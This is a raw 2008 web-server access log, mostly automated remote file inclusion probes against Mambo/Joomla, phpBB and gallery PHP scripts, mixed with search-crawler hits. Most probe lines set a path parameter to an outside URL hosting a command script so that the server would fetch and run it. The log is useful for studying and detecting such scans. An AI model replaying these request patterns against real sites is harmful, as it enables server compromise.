64.59.71.229 - - [31/Jan/2008:07:24:05 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.6.20.143 - - [31/Jan/2008:07:24:44 -0800] "GET /funny/?S=A HTTP/1.0" 200 792 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.23.232 - - [31/Jan/2008:07:25:16 -0800] "GET /minamijewelry/dream.psd HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.85.98.2 - - [31/Jan/2008:07:25:40 -0800] "GET /index.php?body=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:07:26:23 -0800] "GET /logs/access_071230.log//lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:07:26:23 -0800] "GET //lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
75.0.141.110 - - [31/Jan/2008:07:26:23 -0800] "GET /logs//lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:07:29:22 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:07:29:22 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:07:29:22 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.150 - - [31/Jan/2008:07:29:26 -0800] "GET /tmp/?M=D HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:07:30:49 -0800] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.136.2 - - [31/Jan/2008:07:30:49 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.141.48.120 - - [31/Jan/2008:07:33:05 -0800] "GET //login.php?dir=http://alboradaquartet.org/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:07:33:14 -0800] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:07:33:15 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:07:33:19 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.118.114.21 - - [31/Jan/2008:07:33:59 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.139.98 - - [31/Jan/2008:07:34:35 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.55.209.213 - - [31/Jan/2008:07:34:37 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.213 - - [31/Jan/2008:07:34:37 -0800] "GET / HTTP/1.0" 200 2946 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
74.6.26.137 - - [31/Jan/2008:07:35:18 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:44 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:44 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:45 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:45 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:45 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.76.198 - - [31/Jan/2008:07:35:45 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:37:12 -0800] "GET /logs/access_071229.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:37:12 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:37:13 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:38:53 -0800] "GET /logs/access_071225.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:07:39:20 -0800] "GET /index.php?body=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:07:40:43 -0800] "GET /tmp/ HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.204.31 - - [31/Jan/2008:07:41:20 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [31/Jan/2008:07:41:20 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.204.31 - - [31/Jan/2008:07:41:20 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.15 - - [31/Jan/2008:07:42:46 -0800] "GET /logs/access_071228.log HTTP/1.0" 200 398582 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:07:42:50 -0800] "GET /megumi/Necklace/?S=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.142.220.82 - - [31/Jan/2008:07:43:28 -0800] "GET /logs/access_071230.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/safe.gif?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:07:45:14 -0800] "GET /tmp/mailError.log HTTP/1.0" 200 749 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:07:45:37 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:07:46:59 -0800] "GET /tmp/?D=A HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.108 - - [31/Jan/2008:07:47:52 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [31/Jan/2008:07:47:52 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:48:14 -0800] "GET /logs/access.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:48:15 -0800] "GET //newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:48:15 -0800] "GET /logs//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.15.204.31 - - [31/Jan/2008:07:48:18 -0800] "GET /logs/access_071230.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:07:49:03 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:07:49:03 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:07:49:04 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
67.18.58.130 - - [31/Jan/2008:07:49:20 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.28.153.174 - - [31/Jan/2008:07:49:42 -0800] "GET /logs/access_080106.log//newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gilmores.ie/modules/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [31/Jan/2008:07:51:39 -0800] "GET /logs/access_080117.log/old_reports.php?file=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [31/Jan/2008:07:51:39 -0800] "GET /old_reports.php?file=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [31/Jan/2008:07:51:39 -0800] "GET /logs/old_reports.php?file=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
128.103.8.13 - - [31/Jan/2008:07:51:48 -0800] "GET /logs/access_071224.log/old_reports.php?file=http://visual-addicts.com/ind? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:07:52:02 -0800] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:07:52:02 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:07:52:03 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:07:55:58 -0800] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
207.45.176.234 - - [31/Jan/2008:07:56:38 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
207.45.176.234 - - [31/Jan/2008:07:56:38 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.15.191.25 - - [31/Jan/2008:07:56:42 -0800] "GET /logs/access_071230.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.maniez/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.191.25 - - [31/Jan/2008:07:56:43 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.maniez/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.15.191.25 - - [31/Jan/2008:07:56:44 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://prevecamformacion.com/images/.maniez/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:07:58:37 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.212.28.43 - - [31/Jan/2008:07:58:37 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
66.45.242.50 - - [31/Jan/2008:07:59:27 -0800] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
66.45.242.50 - - [31/Jan/2008:07:59:27 -0800] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
203.130.206.51 - - [31/Jan/2008:08:02:00 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://207.234.131.32:32000/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
203.130.206.51 - - [31/Jan/2008:08:02:00 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://207.234.131.32:32000/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:02:00 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:02:01 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.106.20.28 - - [31/Jan/2008:08:02:01 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:08:02:24 -0800] "GET //com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:03:04 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
82.135.207.90 - - [31/Jan/2008:08:03:58 -0800] "GET /!scanhttp://www.iasct.jp/image/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:08:04:41 -0800] "GET /logs/access_080117.log//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:08:04:46 -0800] "GET /logs//com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.243.64.123 - - [31/Jan/2008:08:05:47 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
125.243.64.123 - - [31/Jan/2008:08:05:48 -0800] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://bxsafe.orgfree.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.83.181 - - [31/Jan/2008:08:06:39 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.29.83.181 - - [31/Jan/2008:08:06:39 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
74.6.25.201 - - [31/Jan/2008:08:06:53 -0800] "GET /logs/access_080114.log HTTP/1.0" 200 566288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.135.109.228 - - [31/Jan/2008:08:07:49 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:08:08:27 -0800] "GET /logs/access_080117.log/index.php?body=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:08:08:27 -0800] "GET /logs/index.php?body=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.83.181 - - [31/Jan/2008:08:08:43 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
72.29.83.181 - - [31/Jan/2008:08:08:44 -0800] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
81.169.187.243 - - [31/Jan/2008:08:08:55 -0800] "GET /logs/access_071225.log/index.php?body=http://www.wsteam.net/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
68.161.236.45 - - [31/Jan/2008:08:09:11 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:08:09:31 -0800] "GET /logs/access_071230.log//lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:08:09:32 -0800] "GET //lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.231.170.10 - - [31/Jan/2008:08:09:33 -0800] "GET /logs//lang_english/lang_main_album.php?phpbb_root_path=http://www.doblepenalti.com/web/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:09:46 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:09:46 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.61.165.105 - - [31/Jan/2008:08:09:47 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.wattspot.us/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:11:07 -0800] "GET /logs/access_071202.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:11:07 -0800] "GET //path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:11:07 -0800] "GET /logs//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.13.250.115 - - [31/Jan/2008:08:11:38 -0800] "GET /logs/access_071219.log//path/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.167.199.194 - - [31/Jan/2008:08:12:07 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://novipazar.info/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
